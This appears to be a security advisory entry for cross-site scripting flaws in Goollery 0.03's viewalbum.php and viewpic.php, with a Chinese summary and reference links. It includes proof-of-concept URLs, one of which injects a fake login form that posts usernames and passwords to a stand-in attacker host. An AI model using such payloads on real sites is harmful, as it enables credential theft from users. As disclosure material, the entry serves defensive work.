https://www.exploit-db.com/exploits/24719
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1134

Goollery0.03版本存在跨站脚本攻击(XSS)漏洞。远程攻击者借助（1）viewalbum.php的page参数（2）viewpic.php的btopage参数注入任意HTML或web脚本。

source: http://www.securityfocus.com/bid/11587/info
 
It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
 
These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts.
 
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20name="us
ername"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></fo
rm>&sess=daf5c642ade1162f15c4eb4b7e89da17

http://www.example.com/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1162f15c4eb4b7e89da17

来源:OSVDB
名称:11320
链接:http://www.osvdb.org/11320
来源:OSVDB
名称:11319
链接:http://www.osvdb.org/11319
来源:XF
名称:goollery-viewalbum-viewpic-xss(17957)
链接:http://xforce.iss.net/xforce/xfdb/17957
来源:BID
名称:11587
链接:http://www.securityfocus.com/bid/11587
来源:www.osvdb.org
链接:http://www.osvdb.org/ref/11/11xxx-goollery_multiple.txt
来源:OSVDB
名称:11318
链接:http://www.osvdb.org/11318
来源:SECTRACK
名称:1012062
链接:http://securitytracker.com/id?1012062